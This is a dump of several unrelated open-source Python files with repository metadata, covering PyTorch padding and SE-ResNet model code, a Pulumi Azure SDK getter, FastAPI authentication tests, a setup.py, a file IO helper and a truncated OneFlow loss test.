ax1.plot(pitch, color="tomato")
ax1.set_xlim(0, mel.shape[1])
ax1.set_ylim(0, pitch_max)
ax1.set_ylabel("F0", color="tomato")
ax1.tick_params(
labelsize="x-small", colors="tomato", bottom=False, labelbottom=False
)
ax2 = add_axis(fig, axes[i][0])
ax2.plot(energy, color="darkviolet")
ax2.set_xlim(0, mel.shape[1])
ax2.set_ylim(energy_min, energy_max)
ax2.set_ylabel("Energy", color="darkviolet")
ax2.yaxis.set_label_position("right")
ax2.tick_params(
labelsize="x-small",
colors="darkviolet",
bottom=False,
labelbottom=False,
left=False,
labelleft=False,
right=True,
labelright=True,
)
return fig
def pad_1D(inputs, PAD=0):
def pad_data(x, length, PAD):
x_padded = np.pad(
x, (0, length - x.shape[0]), mode="constant", constant_values=PAD
)
return x_padded
max_len = max((len(x) for x in inputs))
padded = np.stack([pad_data(x, max_len, PAD) for x in inputs])
return padded
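# Worked example added for documentation (not part of the original file): inputs are
# right-padded with PAD up to the longest length and stacked into a single array.
#
#   >>> pad_1D([np.array([1, 2, 3]), np.array([4, 5])]).tolist()
#   [[1, 2, 3], [4, 5, 0]]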
def pad_2D(inputs, maxlen=None):
def pad(x, max_len):
PAD = 0
if np.shape(x)[0] > max_len:
raise ValueError("not max_len")
s = np.shape(x)[1]
x_padded = np.pad(
x, (0, max_len - np.shape(x)[0]), mode="constant", constant_values=PAD
)
return x_padded[:, :s]
if maxlen:
output = np.stack([pad(x, maxlen) for x in inputs])
else:
max_len = max(np.shape(x)[0] for x in inputs)
output = np.stack([pad(x, max_len) for x in inputs])
return output
def pad(input_ele, mel_max_length=None):
if mel_max_length:
max_len = mel_max_length
else:
max_len = max([input_ele[i].size(0) for i in range(len(input_ele))])
out_list = list()
for i, batch in enumerate(input_ele):
if len(batch.shape) == 1:
one_batch_padded = F.pad(
batch, (0, max_len - batch.size(0)), "constant", 0.0
)
elif len(batch.shape) == 2:
one_batch_padded = F.pad(
batch, (0, 0, 0, max_len - batch.size(0)), "constant", 0.0
)
out_list.append(one_batch_padded)
out_padded = torch.stack(out_list)
return out_padded
| 32.430079
| 128
| 0.582947
|
6833e78420e6d3ddde6a3665d232a5e31f7615e6
| 6,524
|
py
|
Python
|
modeling/backbones/senet_ibn_a.py
|
ZHUXUHAN/reid-baseline
|
43e8734be52a90d8131af8c4b43536ba6911bdaa
|
[
"MIT"
] | 2
|
2019-11-30T08:11:22.000Z
|
2019-12-11T14:35:01.000Z
|
modeling/backbones/senet_ibn_a.py
|
ZHUXUHAN/reid-baseline
|
43e8734be52a90d8131af8c4b43536ba6911bdaa
|
[
"MIT"
] | 1
|
2020-01-09T03:48:26.000Z
|
2020-03-07T01:22:37.000Z
|
modeling/backbones/senet_ibn_a.py
|
ZHUXUHAN/reid-baseline
|
43e8734be52a90d8131af8c4b43536ba6911bdaa
|
[
"MIT"
] | 1
|
2019-11-30T09:24:17.000Z
|
2019-11-30T09:24:17.000Z
|
from .se_module import SELayer
import torch.nn as nn
import torch
import math
__all__ = ['se_resnet50_ibn_a', 'se_resnet101_ibn_a', 'se_resnet152_ibn_a']
def conv3x3(in_planes, out_planes, stride=1):
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)
class IBN(nn.Module):
def __init__(self, planes):
super(IBN, self).__init__()
half1 = int(planes / 2)
self.half = half1
half2 = planes - half1
self.IN = nn.InstanceNorm2d(half1, affine=True)
self.BN = nn.BatchNorm2d(half2)
def forward(self, x):
split = torch.split(x, self.half, 1)
out1 = self.IN(split[0].contiguous())
out2 = self.BN(split[1].contiguous())
out = torch.cat((out1, out2), 1)
return out
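# Minimal shape check added for documentation (a sketch relying only on the torch import
# above; it is not part of the original model code): IBN keeps the channel count intact,
# normalizing the first half of the channels with InstanceNorm2d and the rest with
# BatchNorm2d.
def _ibn_shape_example():
    layer = IBN(64)
    x = torch.randn(2, 64, 16, 16)
    # Output shape matches the input; only the normalization differs between the halves.
    assert layer(x).shape == x.shape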
class SEBasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None, reduction=16):
super(SEBasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes, 1)
self.bn2 = nn.BatchNorm2d(planes)
self.se = SELayer(planes, reduction)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.se(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class SEBottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None, ibn=False, reduction=16):
super(SEBottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
if ibn:
self.bn1 = IBN(planes)
else:
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes * 4)
self.relu = nn.ReLU(inplace=True)
self.se = SELayer(planes * 4, reduction)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
out = self.se(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, last_stride, block, layers, num_classes=1000):
self.inplanes = 64
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=last_stride)
self.avgpool = nn.AvgPool2d(7)
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.conv1.weight.data.normal_(0, math.sqrt(2. / (7 * 7 * 64)))
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(0, math.sqrt(2. / n))
elif isinstance(m, nn.BatchNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
elif isinstance(m, nn.InstanceNorm2d):
m.weight.data.fill_(1)
m.bias.data.zero_()
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
ibn = True
if planes == 512:
ibn = False
layers.append(block(self.inplanes, planes, stride, downsample, ibn=ibn))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, 1, None, ibn=ibn))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
# x = self.avgpool(x)
# x = x.view(x.size(0), -1)
# x = self.fc(x)
return x
def load_param(self, model_path):
param_dict = torch.load(model_path)
for i in param_dict['state_dict']:
if 'fc' in i[7:]:
continue
self.state_dict()[i[7:]].copy_(param_dict['state_dict'][i])
def se_resnet50_ibn_a(last_stride):
"""Constructs a ResNet-50 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
    model = ResNet(last_stride, SEBottleneck, [3, 4, 6, 3])
return model
def se_resnet101_ibn_a(last_stride):
"""Constructs a ResNet-101 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(last_stride, SEBottleneck, [3, 4, 23, 3])
return model
def se_resnet152_ibn_a(num_classes):
"""Constructs a ResNet-152 model.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
"""
model = ResNet(SEBottleneck, [3, 8, 36, 3], num_classes=num_classes)
model.avgpool = nn.AdaptiveAvgPool2d(1)
return model
| 31.066667
| 96
| 0.583691
|
fb7849dcd8a3bad4aa8f9e9d9c1b460d92e6ac7a
| 95
|
py
|
Python
|
Python/pierwszy.py
|
amundsenscott4/helloworld
|
f14e77c5a3a3bb2d3d88d730d658589f9a007330
|
[
"MIT"
] | null | null | null |
Python/pierwszy.py
|
amundsenscott4/helloworld
|
f14e77c5a3a3bb2d3d88d730d658589f9a007330
|
[
"MIT"
] | null | null | null |
Python/pierwszy.py
|
amundsenscott4/helloworld
|
f14e77c5a3a3bb2d3d88d730d658589f9a007330
|
[
"MIT"
] | null | null | null |
import random
print("Hello world")
for i in range(10):
print(round(random.random()*100))
| 13.571429
| 37
| 0.684211
|
ccd9b267a6514b826b2accc6a9c70e28110c5d11
| 7,316
|
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20200801/get_packet_capture.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200801/get_packet_capture.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200801/get_packet_capture.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = [
'GetPacketCaptureResult',
'AwaitableGetPacketCaptureResult',
'get_packet_capture',
]
@pulumi.output_type
class GetPacketCaptureResult:
"""
Information about packet capture session.
"""
def __init__(__self__, bytes_to_capture_per_packet=None, etag=None, filters=None, id=None, name=None, provisioning_state=None, storage_location=None, target=None, time_limit_in_seconds=None, total_bytes_per_session=None):
if bytes_to_capture_per_packet and not isinstance(bytes_to_capture_per_packet, float):
raise TypeError("Expected argument 'bytes_to_capture_per_packet' to be a float")
pulumi.set(__self__, "bytes_to_capture_per_packet", bytes_to_capture_per_packet)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if filters and not isinstance(filters, list):
raise TypeError("Expected argument 'filters' to be a list")
pulumi.set(__self__, "filters", filters)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if storage_location and not isinstance(storage_location, dict):
raise TypeError("Expected argument 'storage_location' to be a dict")
pulumi.set(__self__, "storage_location", storage_location)
if target and not isinstance(target, str):
raise TypeError("Expected argument 'target' to be a str")
pulumi.set(__self__, "target", target)
if time_limit_in_seconds and not isinstance(time_limit_in_seconds, int):
raise TypeError("Expected argument 'time_limit_in_seconds' to be a int")
pulumi.set(__self__, "time_limit_in_seconds", time_limit_in_seconds)
if total_bytes_per_session and not isinstance(total_bytes_per_session, float):
raise TypeError("Expected argument 'total_bytes_per_session' to be a float")
pulumi.set(__self__, "total_bytes_per_session", total_bytes_per_session)
@property
@pulumi.getter(name="bytesToCapturePerPacket")
def bytes_to_capture_per_packet(self) -> Optional[float]:
"""
Number of bytes captured per packet, the remaining bytes are truncated.
"""
return pulumi.get(self, "bytes_to_capture_per_packet")
@property
@pulumi.getter
def etag(self) -> str:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def filters(self) -> Optional[Sequence['outputs.PacketCaptureFilterResponse']]:
"""
A list of packet capture filters.
"""
return pulumi.get(self, "filters")
@property
@pulumi.getter
def id(self) -> str:
"""
ID of the packet capture operation.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the packet capture session.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The provisioning state of the packet capture session.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="storageLocation")
def storage_location(self) -> 'outputs.PacketCaptureStorageLocationResponse':
"""
The storage location for a packet capture session.
"""
return pulumi.get(self, "storage_location")
@property
@pulumi.getter
def target(self) -> str:
"""
The ID of the targeted resource, only VM is currently supported.
"""
return pulumi.get(self, "target")
@property
@pulumi.getter(name="timeLimitInSeconds")
def time_limit_in_seconds(self) -> Optional[int]:
"""
Maximum duration of the capture session in seconds.
"""
return pulumi.get(self, "time_limit_in_seconds")
@property
@pulumi.getter(name="totalBytesPerSession")
def total_bytes_per_session(self) -> Optional[float]:
"""
Maximum size of the capture output.
"""
return pulumi.get(self, "total_bytes_per_session")
class AwaitableGetPacketCaptureResult(GetPacketCaptureResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetPacketCaptureResult(
bytes_to_capture_per_packet=self.bytes_to_capture_per_packet,
etag=self.etag,
filters=self.filters,
id=self.id,
name=self.name,
provisioning_state=self.provisioning_state,
storage_location=self.storage_location,
target=self.target,
time_limit_in_seconds=self.time_limit_in_seconds,
total_bytes_per_session=self.total_bytes_per_session)
def get_packet_capture(network_watcher_name: Optional[str] = None,
packet_capture_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetPacketCaptureResult:
"""
Information about packet capture session.
:param str network_watcher_name: The name of the network watcher.
:param str packet_capture_name: The name of the packet capture session.
:param str resource_group_name: The name of the resource group.
"""
__args__ = dict()
__args__['networkWatcherName'] = network_watcher_name
__args__['packetCaptureName'] = packet_capture_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:network/v20200801:getPacketCapture', __args__, opts=opts, typ=GetPacketCaptureResult).value
return AwaitableGetPacketCaptureResult(
bytes_to_capture_per_packet=__ret__.bytes_to_capture_per_packet,
etag=__ret__.etag,
filters=__ret__.filters,
id=__ret__.id,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
storage_location=__ret__.storage_location,
target=__ret__.target,
time_limit_in_seconds=__ret__.time_limit_in_seconds,
total_bytes_per_session=__ret__.total_bytes_per_session)
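# Usage sketch added for documentation (the resource names below are placeholders, not
# real Azure resources; this note is not part of the generated SDK file):
#
#   result = get_packet_capture(
#       network_watcher_name="example-watcher",
#       packet_capture_name="example-capture",
#       resource_group_name="example-rg",
#   )
#   print(result.provisioning_state, result.target)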
| 39.122995
| 225
| 0.675642
|
77b61ab9a3daebbd13f33095349945a7af868ca2
| 6,792
|
py
|
Python
|
app/tests/api/test_auth.py
|
hollyfoxx/ace2-ams-api
|
08ecf3f3dc8ac9abd224465731458950d4f78b7d
|
[
"Apache-2.0"
] | null | null | null |
app/tests/api/test_auth.py
|
hollyfoxx/ace2-ams-api
|
08ecf3f3dc8ac9abd224465731458950d4f78b7d
|
[
"Apache-2.0"
] | null | null | null |
app/tests/api/test_auth.py
|
hollyfoxx/ace2-ams-api
|
08ecf3f3dc8ac9abd224465731458950d4f78b7d
|
[
"Apache-2.0"
] | null | null | null |
import pytest
import time
from datetime import datetime, timedelta
from fastapi import status, testclient
from jose import jwt
from core.config import get_settings, Settings
from tests.helpers import create_test_user
from main import app
#
# INVALID TESTS
#
@pytest.mark.parametrize(
"username,password",
[
("johndoe", "wrongpassword"),
("wronguser", "abcd1234"),
],
)
def test_auth_invalid(client, db, username, password):
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": username, "password": password})
assert auth.status_code == status.HTTP_401_UNAUTHORIZED
assert auth.json()["detail"] == "Invalid username or password"
# Attempt to use a bogus token to access a protected API endpoint
get = client.get("/api/user/", headers={"Authorization": "Bearer asdf"})
assert get.status_code == status.HTTP_401_UNAUTHORIZED
assert get.json()["detail"] == "Invalid token"
def test_disabled_user(client, db):
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
access_token = auth.json()["access_token"]
assert auth.status_code == status.HTTP_200_OK
assert auth.json()["token_type"] == "bearer"
assert access_token
# Attempt to use the token to access a protected API endpoint
headers = {"Authorization": f"Bearer {access_token}"}
get = client.get("/api/user/", headers=headers)
assert get.status_code == status.HTTP_200_OK
assert len(get.json()) == 1
# Disable the user
user_uuid = get.json()[0]["uuid"]
update = client.patch(f"/api/user/{user_uuid}", headers=headers, json={"enabled": False})
assert update.status_code == status.HTTP_204_NO_CONTENT
# The user is disabled, but the token is still valid, so they will still have access until it expires.
get = client.get("/api/user/", headers=headers)
assert get.status_code == status.HTTP_200_OK
assert len(get.json()) == 1
# However, they will not be able to authenticate again to receive a new token.
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
assert auth.status_code == status.HTTP_401_UNAUTHORIZED
assert auth.json()["detail"] == "Invalid username or password"
def test_expired_token(client, db, monkeypatch):
def mock_get_settings():
settings = Settings()
settings.jwt_access_expire_seconds = 1
return settings
# Patching __code__ works no matter how the function is imported
monkeypatch.setattr("core.config.get_settings.__code__", mock_get_settings.__code__)
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
access_token = auth.json()["access_token"]
assert auth.status_code == status.HTTP_200_OK
assert auth.json()["token_type"] == "bearer"
assert access_token
# Attempt to use the token to access a protected API endpoint
get = client.get("/api/user/", headers={"Authorization": f"Bearer {access_token}"})
assert get.status_code == status.HTTP_200_OK
assert len(get.json()) == 1
# Wait for the token to expire
time.sleep(2)
# Attempt to use the token to access a protected API endpoint now that the token is expired
get = client.get("/api/user/", headers={"Authorization": f"Bearer {access_token}"})
assert get.status_code == status.HTTP_401_UNAUTHORIZED
assert get.json()["detail"] == "Access token expired"
@pytest.mark.parametrize(
"key",
[
("username"),
("password"),
],
)
def test_missing_required_fields(client, key):
create_json = {"username": "johndoe", "password": "abcd1234"}
del create_json[key]
create = client.post("/api/auth", json=create_json)
assert create.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
def test_missing_token(client):
# Attempt to access a protected API endpoint without supplying an access token
get = client.get("/api/user/")
assert get.status_code == status.HTTP_401_UNAUTHORIZED
assert get.json()["detail"] == "Not authenticated"
def test_wrong_token_type(client, db):
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
refresh_token = auth.json()["refresh_token"]
assert auth.status_code == status.HTTP_200_OK
assert auth.json()["token_type"] == "bearer"
assert refresh_token
# Attempt to use the refresh token to access a protected API endpoint
get = client.get("/api/user/", headers={"Authorization": f"Bearer {refresh_token}"})
assert get.status_code == status.HTTP_401_UNAUTHORIZED
assert get.json()["detail"] == "Invalid token type"
@pytest.mark.parametrize(
"route",
[route for route in app.routes if route.path.startswith("/api/")],
)
def test_missing_route_authentication(client, route):
"""
This tests every registered API endpoint to ensure that it requires token authentication.
"""
# There are some special endpoints that do not require authentication.
if route.path in ["/api/ping", "/api/auth", "/api/auth/logout"]:
return
for method in route.methods:
if method == "POST":
client_method = client.post
elif method == "GET":
client_method = client.get
elif method == "PATCH":
client_method = client.patch
elif method == "DELETE":
client_method = client.delete
else:
raise ValueError(f"Test does not account for method: {method}")
result = client_method(route.path)
assert result.status_code == status.HTTP_401_UNAUTHORIZED, f"{method} on {route.path} does not require auth!"
#
# VALID TESTS
#
def test_auth_success(client: testclient.TestClient, db):
create_test_user(db, "johndoe", "abcd1234")
# Attempt to authenticate
auth = client.post("/api/auth", data={"username": "johndoe", "password": "abcd1234"})
access_token = auth.json()["access_token"]
refresh_token = auth.json()["refresh_token"]
assert auth.status_code == status.HTTP_200_OK
assert auth.json()["token_type"] == "bearer"
assert access_token
assert refresh_token
assert auth.cookies.get("access_token")
assert auth.cookies.get("refresh_token")
# Attempt to use the token to access a protected API endpoint
get = client.get("/api/user/", headers={"Authorization": f"Bearer {access_token}"})
assert get.status_code == status.HTTP_200_OK
assert len(get.json()) == 1
| 35.375
| 117
| 0.684776
|
afb298e8268114b83aaa96c02238bc5f0ffa86e7
| 2,757
|
py
|
Python
|
setup.py
|
derpferd/smart_open
|
8f64d5b491b3f2f559059f8e16755e30ad2382fa
|
[
"MIT"
] | null | null | null |
setup.py
|
derpferd/smart_open
|
8f64d5b491b3f2f559059f8e16755e30ad2382fa
|
[
"MIT"
] | null | null | null |
setup.py
|
derpferd/smart_open
|
8f64d5b491b3f2f559059f8e16755e30ad2382fa
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Radim Rehurek <me@radimrehurek.com>
#
# This code is distributed under the terms and conditions
# from the MIT License (MIT).
import io
import os
import sys
from setuptools import setup, find_packages
def _get_version():
curr_dir = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(curr_dir, 'smart_open', 'version.py')) as fin:
#
# __version__ = '1.8.4'
#
line = fin.readline().strip()
parts = line.split(' ')
assert parts[0] == '__version__'
assert parts[1] == '='
return parts[2][1:-1]
#
# We cannot do "from smart_open.version import __version__" because that will
# require the dependencies for smart_open to already be in place, and that is
# not necessarily the case when running setup.py for the first time.
#
__version__ = _get_version()
def read(fname):
return io.open(os.path.join(os.path.dirname(__file__), fname), encoding='utf-8').read()
tests_require = [
'mock',
'moto[server]',
'pathlib2',
'responses',
'boto3',
# Not used directly but allows boto GCE plugins to load.
# https://github.com/GoogleCloudPlatform/compute-image-packages/issues/262
'google-compute-engine==2.8.12'
]
install_requires = [
'boto >= 2.32',
'requests',
'boto3',
]
if sys.version_info[0] == 2:
install_requires.append('bz2file')
setup(
name='smart_open',
version=__version__,
description='Utils for streaming large files (S3, HDFS, gzip, bz2...)',
long_description=read('README.rst'),
packages=find_packages(),
package_data={
"smart_open.tests": ["test_data/*gz"],
},
author='Radim Rehurek',
author_email='me@radimrehurek.com',
maintainer='Radim Rehurek',
maintainer_email='me@radimrehurek.com',
url='https://github.com/piskvorky/smart_open',
download_url='http://pypi.python.org/pypi/smart_open',
keywords='file streaming, s3, hdfs',
license='MIT',
platforms='any',
install_requires=install_requires,
tests_require=tests_require,
extras_require={
'test': tests_require,
},
test_suite="smart_open.tests",
classifiers=[
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Topic :: System :: Distributed Computing',
'Topic :: Database :: Front-Ends',
],
)
| 25.766355
| 91
| 0.636924
|
00ed16733bf43d576cddf829ce6f7e6529a2e296
| 4,230
|
py
|
Python
|
mp/core/io.py
|
kerryeon/mp_python
|
1aca4069bc635959fa4f3ce94507c55226219039
|
[
"MIT"
] | 1
|
2021-04-08T01:59:11.000Z
|
2021-04-08T01:59:11.000Z
|
mp/core/io.py
|
kerryeon/mp_python
|
1aca4069bc635959fa4f3ce94507c55226219039
|
[
"MIT"
] | null | null | null |
mp/core/io.py
|
kerryeon/mp_python
|
1aca4069bc635959fa4f3ce94507c55226219039
|
[
"MIT"
] | null | null | null |
import os
from mp.core.expression import Expression as Exp
from mp.core.framework import np
class IO:
def __init__(self, dir_main: str, permission: int = 0o775):
if len(dir_main) == 0:
dir_main = os.path.curdir
self.dir_main = dir_main
self.permission = permission
def get(self, item: str):
path = self.get_path(item)
# is graph file
path_graph = self._get_graph_path(path)
if os.path.exists(path_graph):
return self._load_graph(path_graph)
# is binary file
path_binary = self._get_binary_path(path)
if os.path.exists(path_binary):
return self._load_binary(item, path_binary)
# not found
return None
def set(self, item: str, toward):
paths = item.split('.')
# if toward is None -> remove file
if toward is None:
path_graph = '%s.%s' % (self.get_path(item), Exp.EXTENSION_SOURCE)
path_graph = os.path.join(self.dir_main, path_graph)
if os.path.exists(path_graph):
self._remove(path_graph)
self._remove_dirs(paths)
path_binary = '%s.%s' % (self.get_path(item), Exp.EXTENSION_BINARY)
path_binary = os.path.join(self.dir_main, path_binary)
if os.path.exists(path_binary):
self._remove(path_binary)
self._remove_dirs(paths)
# if toward is constant
elif toward.is_constant:
path = '%s.%s' % (self.get_path(item), Exp.EXTENSION_BINARY)
path = os.path.join(self.dir_main, path)
self.make_dir_recursive(paths, self.dir_main, self.permission)
self._save_binary(path, toward.get_value())
# if toward consists of graph
else:
path = '%s.%s' % (self.get_path(item), Exp.EXTENSION_SOURCE)
path = os.path.join(self.dir_main, path)
self.make_dir_recursive(paths, self.dir_main, self.permission)
self._save_graph(path, toward.code)
@classmethod
def _load_binary_raw(cls, path):
return np.load(path)
@classmethod
def _load_binary(cls, name: str, path: str):
if os.path.exists(path):
with open(path, 'rb') as f:
value = cls._load_binary_raw(f)
return value
return None
@classmethod
def _load_graph(cls, path: str):
if os.path.exists(path):
with open(path, 'r') as f:
msg = f.read()
return msg
return None
@classmethod
def _save_binary(cls, path: str, value):
np.save(path, value, allow_pickle=False)
@classmethod
def _save_graph(cls, path: str, code: str):
with open(path, 'w') as f:
f.write(code)
@classmethod
def _remove(cls, path: str):
os.remove(path)
def _remove_dirs(self, paths):
paths = paths[:-1]
for i in range(len(paths), 0, -1):
path = self.dir_main
for dir_to in paths[:i]:
path = os.path.join(path, dir_to)
num_files = len(os.listdir(path))
# if dir is empty
if os.path.isdir(path) and num_files == 0:
os.rmdir(path)
else:
break
def _get_binary_path(self, path: str):
path = '%s.%s' % (path, Exp.EXTENSION_BINARY)
path = os.path.join(self.dir_main, path)
return path
def _get_graph_path(self, path: str):
path = '%s.%s' % (path, Exp.EXTENSION_SOURCE)
path = os.path.join(self.dir_main, path)
return path
@classmethod
def make_dir_recursive(cls, paths, dir_from=None, permission=0o775):
path = dir_from if dir_from is not None else ''
for dir_name in paths[:-1]:
path = os.path.join(path, dir_name)
if not os.path.exists(path):
os.mkdir(path, mode=permission)
@classmethod
def get_path(cls, filename, dir_from=None):
filename = '/'.join(filename.split('.'))
if dir_from is None:
return filename
dir_from = '/'.join(dir_from.split('.'))
return os.path.join(dir_from, filename)
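# Usage sketch added for documentation (the directory and variable name are made up, and
# `toward` stands for a variable object from this framework; not part of the original
# module):
#
#   io = IO('./workspace')
#   io.set('model.weights', toward)     # writes workspace/model/weights.<binary or source ext>
#   restored = io.get('model.weights')  # returns the stored array or the graph source text
#   io.set('model.weights', None)       # removes the file and prunes now-empty directories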
| 33.571429
| 79
| 0.576832
|
07578e6deca671fd66928ce73a3335fb19697f29
| 5,815
|
py
|
Python
|
python/oneflow/compatible/single_client/test/ops/test_bce_loss.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | 1
|
2021-09-13T02:34:53.000Z
|
2021-09-13T02:34:53.000Z
|
python/oneflow/compatible/single_client/test/ops/test_bce_loss.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | null | null | null |
python/oneflow/compatible/single_client/test/ops/test_bce_loss.py
|
wangyuyue/oneflow
|
0a71c22fe8355392acc8dc0e301589faee4c4832
|
[
"Apache-2.0"
] | null | null | null |
"""
Copyright 2020 The OneFlow Authors. All rights reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import unittest
from collections import OrderedDict
from typing import Dict
import numpy as np
from test_util import GenArgList
import oneflow.compatible.single_client.unittest
from oneflow.compatible import single_client as flow
from oneflow.compatible.single_client import typing as tp
def _compare_bceloss_with_np(
input_shape, target_shape, weight_shape, device_type, machine_ids, device_counts
):
input = np.random.random(size=input_shape).astype(np.float32)
target = np.random.random(size=target_shape).astype(np.float32)
weight = np.random.random(size=weight_shape).astype(np.float32)
assert device_type in ["cpu", "gpu"]
flow.clear_default_session()
if device_type == "cpu":
flow.config.cpu_device_num(device_counts)
else:
flow.config.gpu_device_num(device_counts)
func_config = flow.FunctionConfig()
func_config.default_placement_scope(flow.scope.placement(device_type, machine_ids))
def np_bceloss(np_input, np_target, np_weight):
np_bce = -np_weight * (
np_target * np.log(np_input) + (1 - np_target) * np.log(1 - np_input)
)
np_bce_mean = np.mean(np_bce)
np_bce_sum = np.sum(np_bce)
return {
"np_bce_loss": np_bce,
"np_bce_loss_mean": np_bce_mean,
"np_bce_loss_sum": np_bce_sum,
}
def np_bce_loss_diff(np_input, np_target, np_weight):
elemcnt = np_target.size
np_bce_grad_mean = (
-(np_weight / elemcnt)
* (np_target - np_input)
/ ((1 - np_input) * np_input)
)
